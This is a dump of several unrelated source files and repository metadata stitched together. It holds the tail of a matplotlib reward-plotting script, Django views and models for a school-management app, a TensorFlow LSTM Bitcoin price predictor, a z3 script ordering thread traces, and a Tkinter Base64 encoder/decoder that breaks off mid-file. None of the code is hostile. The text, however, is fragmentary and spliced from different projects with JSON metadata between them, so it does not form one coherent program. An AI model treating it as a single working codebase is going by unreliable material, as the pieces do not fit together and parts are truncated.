plt.ylabel('Average reward', font)\r\n 
plt.xlabel('训练回合数', font1)\r\n plt.ylabel('平均奖励值', font1)\r\n a1 = np.array(a1)\r\n a10 = np.mean(a1)\r\n plt.title('mean is %.4f' % a10, font)\r\n print('Gt is %.6f' % a10)\r\n\r\n plt.plot(reward_list, a1, c='blue', ls='-', marker='', label=\"MADDPG\")\r\n plt.grid()\r\n plt.tick_params(labelsize=labelsize)\r\n # plt.legend(loc='lower right', prop=font)\r\n\r\n x_major_locator = MultipleLocator(5000)\r\n y_major_locator = MultipleLocator(20)\r\n ax = plt.gca()\r\n ax.xaxis.set_major_locator(x_major_locator)\r\n ax.yaxis.set_major_locator(y_major_locator)\r\n\r\n\r\n plt.savefig('Gt.png')\r\n plt.show()\r\n" } ]
2
rubenvereecken/show-attend-and-tell
https://github.com/rubenvereecken/show-attend-and-tell
2077371d3d96cc1e7aef34f6608845e068a26c57
79a635583fa8d63eaefe2a6a74922b66b7cf9186
0f5799dea54d2ad5545a95607323c48c46ee2026
refs/heads/master
2020-03-29T02:16:41.247224
2017-06-22T08:50:08
2017-06-22T09:49:30
94,643,651
0
0
null
2017-06-17T19:05:33
2017-06-15T14:11:14
2017-05-23T03:55:10
null
[ { "alpha_fraction": 0.5705483555793762, "alphanum_fraction": 0.5921133756637573, "avg_line_length": 45.371429443359375, "blob_id": "405d64f0b090094b03bd34b4a441e1a97aaff6b3", "content_id": "838fed3e9fbb8496b8746d3add6805e8adb0f503", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1623, "license_type": "permissive", "max_line_length": 114, "num_lines": 35, "path": "/train.py", "repo_name": "rubenvereecken/show-attend-and-tell", "src_encoding": "UTF-8", "text": "from core.solver import CaptioningSolver\nfrom core.model import CaptionGenerator\nfrom core.utils import load_coco_data\n\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data-path', dest='data_path', default='./data')\n parser.add_argument('--image-path', dest='image_path', default='./image')\n parser.add_argument('--model-path', dest='model_path', default='model/lstm')\n parser.add_argument('--test-model', dest='test_model', default='model/lstm/model-10')\n\n args = parser.parse_args()\n\n # load train dataset\n data = load_coco_data(data_path=args.data_path, split='train')\n word_to_idx = data['word_to_idx']\n # load val dataset to print out bleu scores every epoch\n val_data = load_coco_data(data_path=args.data_path, split='val')\n\n model = CaptionGenerator(word_to_idx, dim_feature=[196, 512], dim_embed=512,\n dim_hidden=1024, n_time_step=16, prev2out=True,\n ctx2out=True, alpha_c=1.0, selector=True, dropout=True)\n\n solver = CaptioningSolver(model, data, val_data, n_epochs=20, batch_size=128, update_rule='adam',\n learning_rate=0.001, print_every=1000, save_every=1,\n image_path=args.image_path + '/', # Why the trailing slash?\n pretrained_model=None, model_path=args.model_path, test_model=args.test_model,\n print_bleu=True, log_path='log/')\n\n solver.train()\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
zwlanpishu/Bitcoin-Prediction
https://github.com/zwlanpishu/Bitcoin-Prediction
18eafbaed00ac85a92b87e574ca3068e18cfafb2
117e3d9ae0c35d26d864127f97ff9f1ec65c6c26
a39b9573281e1416234cd66f912fb71a74c826ad
refs/heads/master
2020-04-11T18:42:20.344599
2018-12-20T02:42:17
2018-12-20T02:42:17
162,008,587
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5752788186073303, "alphanum_fraction": 0.5911625623703003, "avg_line_length": 34.416168212890625, "blob_id": "e367a66ea0931f070a802f0c9c390f5ab529bbfa", "content_id": "42f55b63ccc6de480591fa2680dac8d1dda6fcb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11836, "license_type": "no_license", "max_line_length": 112, "num_lines": 334, "path": "/BitcoinPredict.py", "repo_name": "zwlanpishu/Bitcoin-Prediction", "src_encoding": "UTF-8", "text": "import tensorflow as tf \nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport math\nfrom sklearn.preprocessing import StandardScaler\nimport io\n\n\ndef data_preprocess() : \n \"\"\"\n implement the Bitcoin data preprocess\n return: scaled data of the select target with shape (1273, 1)\n \"\"\"\n\n # load the Bitcoin data needed\n btc = pd.read_csv(\"btc.csv\")\n\n # select the target data to be predicted, the data got is one dimension ndarray\n data_to_use = btc[\"Close\"].values\n print(data_to_use.shape)\n assert(data_to_use.shape == (1273,))\n\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data_to_use.reshape(-1, 1))\n assert(scaled_data.shape == (1273, 1))\n\n # plot the data to have an intuition\n plt.figure(figsize = (8, 6), frameon = False, facecolor = \"brown\", edgecolor = \"blue\")\n plt.title(\"Bitcoin Prices from December 2014 to May 2018\")\n plt.xlabel(\"Days\")\n plt.ylabel(\"Scaled Price of Bitcoin\")\n plt.plot(scaled_data, label = \"Price\")\n plt.show()\n\n\n return scaled_data\n\n\ndef data_windowing(data, window_size = 7) :\n \"\"\"\n windowing the data for the later RNN\n return: X -- the window data list, 1266 elements, each element is a (1, 1, 7) ndarray\n Y -- the window data list, 1266 elements, each element is a (1, 1, 1) ndarray\n \"\"\"\n\n X = []\n Y = []\n index = 0\n while ((index + window_size) <= len(data) - 1) : \n window_X = data[index : index + window_size, :].reshape(1, 1, window_size)\n window_Y = data[index + window_size, :].reshape(1, 1, 1)\n X.append(window_X)\n Y.append(window_Y)\n index += 1\n \n assert(len(X) == len(Y))\n print(\"the len of X is: \" + str(len(X)))\n print(\"the len of Y is: \" + str(len(Y)))\n return X, Y\n\n\ndef build_dataset(X, y) : \n \"\"\"\n build the train dataset and test dataset\n return: X_train -- ndarray of shape (1018, 1, 1, 7)\n y_train -- ndarray of shape (1018, 1, 1, 1)\n X_test -- ndarray of shape (248, 1, 1, 7)\n y_test -- ndarray of shape (248, 1, 1, 1)\n \"\"\"\n\n # build the training dataset\n X_train = np.array(X[ : 1018])\n y_train = np.array(y[ : 1018])\n\n # build the testing dataset\n X_test = np.array(X[1018 : ])\n y_test = np.array(y[1018 : ])\n\n # take care of the dimensions of dataset\n print(\"X_train size is \" + str(X_train.shape))\n print(\"y_train size is \" + str(y_train.shape))\n\n print(\"X_test size is \" + str(X_test.shape))\n print(\"y_test size is \" + str(y_test.shape))\n\n return X_train, y_train, X_test, y_test\n\n\ndef build_mini_batches(X_train, y_train, mini_batch_size = 1) : \n \"\"\"\n build the mini batches of training dataset\n return: mini_batches -- the list of turple, contains (mini_batch_X, mini_batch_Y)\n where mini_batch_X's shape is (mini_batch_size, 1, 1, 7)\n where mini_batch_Y's shape is (mini_batch_size, 1, 1, 1)\n \"\"\"\n\n num = X_train.shape[0]\n mini_batches = []\n \n num_complete_minibatches = math.floor(num / mini_batch_size)\n\n for i in range(0, num_complete_minibatches * 
mini_batch_size, mini_batch_size) : \n mini_batch_X = X_train[i : i + mini_batch_size]\n mini_batch_Y = y_train[i : i + mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n if (num % mini_batch_size != 0) : \n mini_batch_X = X_train[num_complete_minibatches * mini_batch_size : ]\n mini_batch_Y = y_train[num_complete_minibatches * mini_batch_size : ]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n return mini_batches\n\n\ndef create_XY(window_size, dim_x, dim_y) : \n \"\"\"\n create the place_holders of X and Y\n return: X -- is a mini_batch place_holder of training data\n Y -- is a mini_batch place_holder of training data\n \"\"\"\n X = tf.placeholder(tf.float32, (1, dim_x, 1, window_size))\n Y = tf.placeholder(tf.float32, (1, dim_y, 1, 1))\n return X, Y\n\n\ndef initialize_para(dim_x, dim_y, dim_a) : \n\n # weights for the update gate\n weights_update_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_update_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_update = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the forget gate\n weights_forget_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_forget_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_forget = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the output gate\n weights_output_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_output_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_output = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the memory cell\n weights_memory = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_memory_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_memory = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the predict layer\n weights_predict = tf.Variable(tf.truncated_normal((dim_y, dim_a), stddev = 0.05))\n bias_predict = tf.Variable(tf.zeros((dim_y, 1)))\n\n parameters = {\"weights_update_gate\" : weights_update_gate,\n \"weights_update_activ\" : weights_update_activ,\n \"bias_update\" : bias_update, \n \"weights_forget_gate\" : weights_forget_gate, \n \"weights_forget_activ\" : weights_forget_activ, \n \"bias_forget\" : bias_forget, \n \"weights_output_gate\" : weights_output_gate, \n \"weights_output_activ\" : weights_output_activ, \n \"bias_output\" : bias_output, \n \"weights_memory\" : weights_memory,\n \"weights_memory_activ\" : weights_memory_activ, \n \"bias_memory\" : bias_memory,\n \"weights_predict\" : weights_predict,\n \"bias_predict\" : bias_predict}\n\n return parameters\n\n\ndef LSTM_unit(x_t, c_prev, a_prev, parameters) : \n \"\"\"\n implement the LSTM unit for RNN\n argument: x_t -- x at time t\n c_prev -- c at time t - 1\n a_prev -- a at time t - 1\n parameters -- weights and bias for LSTM unit\n \n return: c_next -- c at time t\n a_next -- a at time t\n \"\"\"\n\n update_gate = tf.sigmoid(tf.matmul(parameters[\"weights_update_gate\"], x_t) + \n tf.matmul(parameters[\"weights_update_activ\"], a_prev) + \n parameters[\"bias_update\"])\n\n forget_gate = tf.sigmoid(tf.matmul(parameters[\"weights_forget_gate\"], x_t) + \n tf.matmul(parameters[\"weights_forget_activ\"], a_prev) + \n parameters[\"bias_forget\"])\n\n output_gate = tf.sigmoid(tf.matmul(parameters[\"weights_output_gate\"], x_t) + \n tf.matmul(parameters[\"weights_output_activ\"], a_prev) + \n 
parameters[\"bias_output\"]) \n\n c_tilde = tf.tanh(tf.matmul(parameters[\"weights_memory\"], x_t) + \n tf.matmul(parameters[\"weights_memory_activ\"], a_prev) + \n parameters[\"bias_memory\"])\n \n c_next = update_gate * c_tilde + forget_gate * c_prev\n a_next = output_gate * tf.tanh(c_next)\n\n return c_next, a_next\n\n\ndef forward_propagation(x, parameters, dim_x, dim_y, dim_a) :\n \"\"\"\n implement the forward propagation\n \"\"\"\n\n window_size = x.shape[-1]\n c_0 = np.zeros((dim_a, 1), dtype = np.float32)\n a_0 = np.zeros((dim_a, 1), dtype = np.float32)\n c_next = c_0\n a_next = a_0\n \n for t in range(window_size) : \n c_next, a_next = LSTM_unit(x[0, :, :, t], c_next, a_next, parameters)\n predict = tf.matmul(parameters[\"weights_predict\"], a_next) + parameters[\"bias_predict\"]\n\n return predict\n \n \ndef compute_cost(predict, Y) : \n \"\"\"\n compute the cost of one mini_batch\n \"\"\"\n\n print(\"the shape of predict is \" + str(predict.shape))\n print(\"the shape of Y is \" + str(Y.shape))\n print(\"the shape of Y[0, :, :, 0] is \" + str(Y[0, :, :, 0].shape))\n \n cost = tf.reduce_mean(tf.losses.mean_squared_error(Y[0, :, :, 0], predict))\n print(\"the cost is \" + str(cost))\n return cost\n\n\ndef predict_model(X_train, X_test, Y_train, Y_test, learning_rate = 0.001,\n num_epoches = 200, mini_batch_size = 1, \n dim_a = 256, print_cost = True) : \n \"\"\"\n implement the Bitcoin predict model\n \"\"\"\n\n # reset computation graph \n tf.reset_default_graph()\n\n # get dimensions\n assert(X_train.shape[0] == Y_train.shape[0])\n (num, dim_x, _, window_size) = X_train.shape\n (num, dim_y, _, _) = Y_train.shape\n\n num_mini_batches = num / mini_batch_size\n costs = []\n\n # build the computation graph\n X, Y = create_XY(window_size, dim_x, dim_y)\n parameters = initialize_para(dim_x, dim_y, dim_a)\n predict = forward_propagation(X, parameters, dim_x, dim_y, dim_a)\n cost = compute_cost(predict, Y)\n\n # define optimizer with gradient clipping\n gradients = tf.gradients(cost, tf.trainable_variables())\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, 4)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n trained_optimizer = optimizer.apply_gradients(zip(clipped_gradients, tf.trainable_variables()))\n\n init = tf.global_variables_initializer()\n\n # run the session to optimize the cost\n sess = tf.Session()\n sess.run(init)\n\n for i in range(num_epoches) : \n mini_batch_cost = 0\n mini_batches = build_mini_batches(X_train, Y_train, mini_batch_size)\n\n for mini_batch in mini_batches : \n (mini_batch_X, mini_batch_Y) = mini_batch\n temp_cost, _ = sess.run([cost, trained_optimizer], feed_dict = {X : mini_batch_X, Y : mini_batch_Y})\n mini_batch_cost += (temp_cost / num_mini_batches)\n \n if (print_cost == True) and (i % 5 == 0) : \n print(\"After epoch %d %f\" %(i, mini_batch_cost))\n if (print_cost == True) and (i % 1 == 0) : \n costs.append(mini_batch_cost)\n \n plt.figure()\n plt.plot(costs)\n plt.ylabel(\"cost\")\n plt.xlabel(\"epoches\")\n plt.title(\"learning rate = \" + str(learning_rate))\n plt.show()\n \n\n # predict on the test set\n predicts_test = []\n error = 0\n mini_batches_test = build_mini_batches(X_test, Y_test, mini_batch_size)\n for mini_batch_test in mini_batches_test : \n (mini_test_X, mini_test_Y) = mini_batch_test\n predict_test = sess.run(predict, feed_dict = {X : mini_test_X})\n assert(predict_test.shape == mini_test_Y[0, :, :, 0].shape)\n\n error += np.mean(np.square(predict_test - mini_test_Y[0, :, :, 0]))\n 
predicts_test.append(predict_test.reshape(()))\n \n \n error = error / len(mini_batches_test)\n return predicts_test, error\n\n\n\n\"\"\"\nthe main func process\n\"\"\"\n# get the training set data and the testing set data\nscaled_data = data_preprocess()\nX, Y = data_windowing(scaled_data)\nX_train, Y_train, X_test, Y_test = build_dataset(X, Y)\n\n# run the model to get the predicts\npredicts_test, error = predict_model(X_train, X_test, Y_train, Y_test)\n\n# \nplt.figure(figsize = (8, 6), frameon = False, facecolor = \"brown\", edgecolor = \"blue\")\nplt.title(\"Bitcoin Prices Predicted\")\nplt.xlabel(\"Days\")\nplt.ylabel(\"Scaled Price of Bitcoin\")\nplt.plot(np.squeeze(Y_test), label = \"Real Price\")\nplt.plot(np.array(predicts_test), label = \"Prediction Price\")\nplt.legend()\nplt.show()\n\n\n\n\n\n\n\n" } ]
1
jonlatorre/gestioneide
https://github.com/jonlatorre/gestioneide
d7d133f4708ad676e525f622264e7bc641e77e7a
fc470a55b0a15171452f1c89e75aa65059f5c56d
d012e6fa57f6dc92a82488073bbedad16ddd1012
refs/heads/master
2016-09-07T03:51:03.669336
2015-07-01T18:22:27
2015-07-01T18:22:27
10,667,395
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6873786449432373, "alphanum_fraction": 0.6873786449432373, "avg_line_length": 38.61538314819336, "blob_id": "c404abd8b0544fec4407a363666fb198ea61ca9d", "content_id": "fe1494cd699155fbda09753284b1687629cfcb55", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "permissive", "max_line_length": 84, "num_lines": 13, "path": "/profesores/urls.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib import admin\nadmin.autodiscover()\nfrom views import *\n\n\nurlpatterns = patterns(\"\",\n url(r\"^$\", ListaProfesores.as_view(), name=\"profesores_lista\"),\n url(r\"^nuevo/$\", NuevoProfesor.as_view(), name=\"profesor_nuevo\"),\n url(r\"^editar/(?P<pk>\\d+)/$\", EditarProfesor.as_view(), name=\"profesor_editar\"),\n url(r\"^borrar/(?P<pk>\\d+)/$\", BorrarProfesor.as_view(), name=\"profesor_borrar\"),\n )\n" }, { "alpha_fraction": 0.698113203048706, "alphanum_fraction": 0.698113203048706, "avg_line_length": 33.45000076293945, "blob_id": "5435db66cad00de6cf3ad4d38841346955aa29cf", "content_id": "aeb0a3032e8edc57c2572b4cdfc404621e7a7b7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 81, "num_lines": 20, "path": "/gestioneide/urls.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.contrib import admin\n\n\nurlpatterns = patterns(\n \"\",\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^admin/\", include(admin.site.urls)),\n url(r\"^account/\", include(\"account.urls\")),\n url(r\"^aulas/\", include(\"aulas.urls\")),\n url(r\"^profesores/\", include(\"profesores.urls\")),\n url(r\"^grupos/\", include(\"grupos.urls\")),\n url(r\"^clases/\", include(\"clases.urls\")),\n)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n" }, { "alpha_fraction": 0.7986577153205872, "alphanum_fraction": 0.7986577153205872, "avg_line_length": 20.285715103149414, "blob_id": "a5d76bbdcfaeac2462daa9ef4e1b6b56f0875f16", "content_id": "302ab44e255ba3802b9277b8e504a11792ac35b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "permissive", "max_line_length": 44, "num_lines": 7, "path": "/profesores/admin.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom models import *\n\nclass ProfesorAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Profesor, ProfesorAdmin)\n" }, { "alpha_fraction": 0.6468842625617981, "alphanum_fraction": 0.6646884083747864, "avg_line_length": 36.44444274902344, "blob_id": "fe66aa1b6746d46bd9b8e79f65fa78fa9ebdaf1f", "content_id": "59901a15850b4012682fab6f43e0a9b0c3865ce1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 337, "license_type": "permissive", "max_line_length": 59, "num_lines": 9, "path": "/profesores/models.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass 
Profesor(models.Model):\n nombre = models.CharField('Nombre',max_length=255,)\n apellido = models.CharField('Apellido',max_length=255,)\n def __unicode__(self):\n return \"%s %s\"%(self.nombre,self.apellido)\n def get_absolute_url(self):\n return \"/profesores/editar/%i/\" % self.id\n" }, { "alpha_fraction": 0.7613168954849243, "alphanum_fraction": 0.7613168954849243, "avg_line_length": 29.375, "blob_id": "383b9c44cffb975d78ca05150f3a7e60f5be6c2e", "content_id": "049ec00a50d31cf07af89bf4ad8f25dae8dd3a61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "permissive", "max_line_length": 72, "num_lines": 24, "path": "/profesores/views.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.views.generic import ListView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom models import *\n#from forms import *\n\nclass ListaProfesores(ListView):\n model = Profesor\n template_name=\"profesores.html\"\n context_object_name = \"profesores_list\"\n \nclass NuevoProfesor(CreateView):\n\tmodel = Profesor\n\ttemplate_name=\"profesor_nuevo.html\"\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n\t\nclass EditarProfesor(UpdateView):\n\tmodel = Profesor\n\ttemplate_name=\"profesor_editar.html\"\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n\nclass BorrarProfesor(DeleteView):\n\tmodel = Profesor\n\t\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n" } ]
5
testrepo007/Constraint-solver
https://github.com/testrepo007/Constraint-solver
33a686d5ad4dc455265c6a486f8bffd1a1959367
9e0a52d16f14802b33e3317bdd26829e4f081b13
04cc66211ab246e9e48dea7d65823bf309f3d575
refs/heads/master
2020-04-24T07:10:40.562327
2019-02-21T03:01:08
2019-02-21T03:01:08
171,789,834
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.835616409778595, "alphanum_fraction": 0.835616409778595, "avg_line_length": 35.5, "blob_id": "7e9e020f3c99cb8cca1a8abf3eb31fcc4455a593", "content_id": "86b8ea6643964a38b1a23be57392bf4bf70f7d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 73, "license_type": "no_license", "max_line_length": 52, "num_lines": 2, "path": "/README.md", "repo_name": "testrepo007/Constraint-solver", "src_encoding": "UTF-8", "text": "# Constraint-solver\nConstraint solver used in generating trace for Light\n" }, { "alpha_fraction": 0.7235475778579712, "alphanum_fraction": 0.7415099740028381, "avg_line_length": 34.63999938964844, "blob_id": "b65b5d9d6aab186d1617821962c70d623fd6245f", "content_id": "3a62aa8a87ea91b91d94eb4bacedbbab152c9b2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3563, "license_type": "no_license", "max_line_length": 140, "num_lines": 100, "path": "/cs.py", "repo_name": "testrepo007/Constraint-solver", "src_encoding": "UTF-8", "text": "from z3 import *\nf = open(\"dependencySet.out\",\"r\")\n#OutputListFormat following will have a List of Lists eg [[12 23 53],[23,64,35],[345,554,545,84]]\nOutputListFormat = list()\n\n#prepopulate outputlistFormat with empty lists\nfor i in range(10):\n\tOutputListFormat.insert(i,list())\n\ninputDependencySet = []\n# declare two lists for inter-thread dependencies\nhbFrom = list()\nhbTo = list()\n\nif f.mode == \"r\":\n\tinputDependencySet = f.readlines() # read in all the dependency pairs\n\tfor inputLine in inputDependencySet:\n\t\tdependencyArray = inputLine.split(\"-\")\n\n\t\t#populate the hb lists above\t\t\n\t\thbFrom.append(int(str(int(dependencyArray[0]) + 1) + str(dependencyArray[1])))\n\t\thbTo.append(int(str(int(dependencyArray[2]) + 1) + str(dependencyArray[3])))\n\n\t\t#inset event(threadid, instruction count into thread's list)\n\t\tOutputListFormat[int(dependencyArray[0])].append(int(dependencyArray[1]))\t\t\n\t\tOutputListFormat[int(dependencyArray[2])].append(int(dependencyArray[3]))\t\n\nf.close();\n\n#clean up OutputListFormat for empty indexes (for traces with threads less than 10)\ndellist = list()\nz = 0\nfor i in range(len(OutputListFormat)):\n\tif not OutputListFormat[i]:\n\t\tdellist.insert(z,i)\n\tz = z + 1\ndel OutputListFormat[dellist[0]:]\ndel dellist\n#List threads' events created in OutputListFormat\n#and remove duplicate events in each thread's list and sort them\n#trace contains every unique event from every thread\n#in the trace\n\noriginalTrace = list()\nfor a in range(len(OutputListFormat)):\n\tOutputListFormat[a] = list(dict.fromkeys(OutputListFormat[a]))\n\tOutputListFormat[a].sort()\n\tfor b in OutputListFormat[a]:\n\t\toriginalTrace.append(int(str(int(a+1)) + str(b)))\n\ndel OutputListFormat\n#originalTrace contains all unique events in record trace\n\nhbLength = len(hbFrom)\ntraceLength = len(originalTrace)\n\n#declare Integer lists in z3 based from formatted data\nhbFrom1 = [Int('%i' % i) for i in hbFrom]\nhbTo1 = [Int('%i' % j) for j in hbTo]\noriginalTrace1 = [Int('%i' % k) for k in originalTrace]\n\n# Get list of unique postions for every event in trace output\noriginalTracePositions = [Int('%i' % l) for l in range(traceLength)]\n\n#create solver using Inter difference logic and add assert constraints\ns = SolverFor(\"QF_IDL\")\n\n#ensure trace indexes stay within range of tracelength\nfor i in range(traceLength):\n\ts.add(originalTracePositions[i] >= 0, 
originalTracePositions[i] <= (traceLength-1))\n\n#ensure the positions in final trace are distinct\ns.add(Distinct(originalTracePositions))\n\n#assert intra-thread dependencies for all threads\nfor i in range(traceLength):\n\t#get first index of event pairs and \n\t#check if they match(means from the same thread)\n\tif i + 1 < traceLength and str(originalTrace[i])[0] == str(originalTrace[i+1])[0]:\n\t\ts.add(originalTracePositions[originalTrace1.index(originalTrace1[i])] < originalTracePositions[originalTrace1.index(originalTrace1[i+1])])\n\n#assert inter-thread dependencies\nfor m in range(hbLength):\n\ts.add(originalTracePositions[originalTrace1.index(hbFrom1[m])] < originalTracePositions[originalTrace1.index(hbTo1[m])])\n\nnoOfTraces = 0\nwhile s.check() == sat:\n noOfTraces += 1\n mod = s.model()\n # The positions\n pp = [mod.eval(p).as_long() for p in originalTracePositions]\n\n # Print trace suggestion \n print [originalTrace1[j] for i in range(traceLength) for j in range(traceLength) if pp[j] == i]\n\n # Add this trace as an assertion to solver \n s.add(Or([originalTracePositions[i] != mod.eval(originalTracePositions[i]) for i in range(traceLength)]))\n print\n \nprint \"Number of distinct traces= \", noOfTraces" } ]
2
boonkeato/Base64FileConverter
https://github.com/boonkeato/Base64FileConverter
a13febe92f2113317f16651deeb5e62c368aac0f
9355228d61d5d559e6e7358e6211c9a2efa059fc
079e69293091d0166f906d17bf7f6b5deb9b9bde
refs/heads/master
2020-04-19T02:10:27.268950
2019-01-28T03:47:38
2019-01-28T03:47:38
167,894,388
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6843394637107849, "alphanum_fraction": 0.6955380439758301, "avg_line_length": 31.11236000061035, "blob_id": "a65afe4f78741decff562dc71afdfaaf4e1727e0", "content_id": "3bd5629d08d78778c7a96d8175b41ddc9da47a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5715, "license_type": "no_license", "max_line_length": 103, "num_lines": 178, "path": "/Base64FileConverterGUI.py", "repo_name": "boonkeato/Base64FileConverter", "src_encoding": "UTF-8", "text": "from tkinter import Tk\nfrom tkinter import Label\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import filedialog\nfrom tkinter import StringVar\nfrom tkinter import END\nfrom tkinter import E\nfrom tkinter import W\nfrom tkinter import scrolledtext\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import INSERT\nfrom tkinter import Menu\nfrom tkinter import BooleanVar\nimport base64\nimport binascii\nimport imghdr\n\n\ndef select_file():\n filename = filedialog.askopenfilename()\n if filename is \"\": return\n filepath_txt.configure(state=\"normal\")\n filepath_txt.delete(0, END)\n filepath_txt.insert(0, filename)\n filepath_txt.configure(state=\"readonly\")\n convert_btn.configure(state=\"normal\")\n savefile_btn.configure(state=\"disabled\")\n\n\ndef convert():\n filename = filepath_txt.get()\n try:\n with open(filename, \"rb\") as targetFile:\n encodedFile = base64.b64encode(targetFile.read())\n output_panel.configure(state=\"normal\")\n output_panel.delete(1.0, END)\n output_panel.insert(INSERT, encodedFile)\n output_panel.configure(state=\"disabled\")\n except:\n messagebox.showerror(\"Error\", \"No file exists\")\n convert_btn.configure(state=\"disabled\")\n savefile_btn.configure(state=\"normal\")\n\n\ndef save_file():\n f = filedialog.asksaveasfile(mode=\"w\", defaultextension=\".txt\")\n if f is None: return\n try:\n f.write(output_panel.get(1.0, END))\n f.close()\n except:\n messagebox.showerror(\"Error\", \"Error during file write\")\n f.close()\n\n\ndef show_decode():\n if not decode_button.get(): \n decode_button.set(True)\n return\n encode_button.set(False)\n toolbar.pack_forget()\n treeframe.pack_forget()\n decode_toolbar.pack(side=\"top\", fill=\"x\")\n decode_treeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\n\ndef show_encode():\n if not encode_button.get(): \n encode_button.set(True)\n return\n decode_button.set(False)\n decode_toolbar.pack_forget()\n decode_treeframe.pack_forget()\n toolbar.pack(side=\"top\", fill=\"x\")\n treeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\n\ndef load_file():\n filepath = filedialog.askopenfilename()\n if filepath is \"\": return\n try:\n with open(filepath, \"r\") as targetFile:\n encodedFile = targetFile.read()\n filepreview_panel.configure(state=\"normal\")\n filepreview_panel.delete(1.0, END)\n filepreview_panel.insert(INSERT, encodedFile)\n filepreview_panel.configure(state=\"disabled\") \n decodeto_btn.configure(state=\"normal\")\n except UnicodeDecodeError:\n messagebox.showerror(\"Error\", \"System expects a text file containing base64 string\")\n except:\n messagebox.showerror(\"Error\", \"No file exists\")\n \n \ndef decode_and_save_file():\n fileContent = filepreview_panel.get(1.0, END)\n\n try:\n decoded_fileContent = base64.b64decode(fileContent)\n except binascii.Error:\n messagebox.showerror(\"Error\", \"Not a valid base64 input\")\n\n # TODO: automatically find out what is the extension\n\n f = 
filedialog.asksaveasfile(mode=\"wb\")\n if f is None: return\n try:\n f.write(decoded_fileContent)\n f.close()\n except:\n messagebox.showerror(\"Error\", \"Error during file write\")\n f.close()\n\n\nwindow = Tk()\nwindow.title(\"Base64 File Converter\")\nwindow.geometry(\"480x300\")\n\n# ---------- Sample Menu code\nmenu = Menu(window)\nencodeDecodeMenu = Menu(menu, tearoff=0)\nencode_button = BooleanVar()\nencode_button.set(True)\ndecode_button = BooleanVar()\nencodeDecodeMenu.add_checkbutton(label=\"Encode Base64\", variable=encode_button, command=show_encode)\nencodeDecodeMenu.add_checkbutton(label=\"Decode Base64\", variable=decode_button, command=show_decode)\nmenu.add_cascade(label=\"File\", menu=encodeDecodeMenu)\nwindow.config(menu=menu)\n\n#----------- Define Tabs\n# tab_control = ttk.Notebook(window)\n# encode_tab = ttk.Frame(tab_control)\n# decode_tab = ttk.Frame(tab_control)\n# tab_control.add(encode_tab, text=\"Encode Base64\")\n# tab_control.add(decode_tab, text=\"Decode Base64\")\n\n# lbl1 = Label(encode_tab, text=\"label1\")\n# lbl1.grid(column=0, row=0)\n# lbl2 = Label(decode_tab, text=\"label2\")\n# lbl2.grid(column=0, row=0)\n\n# 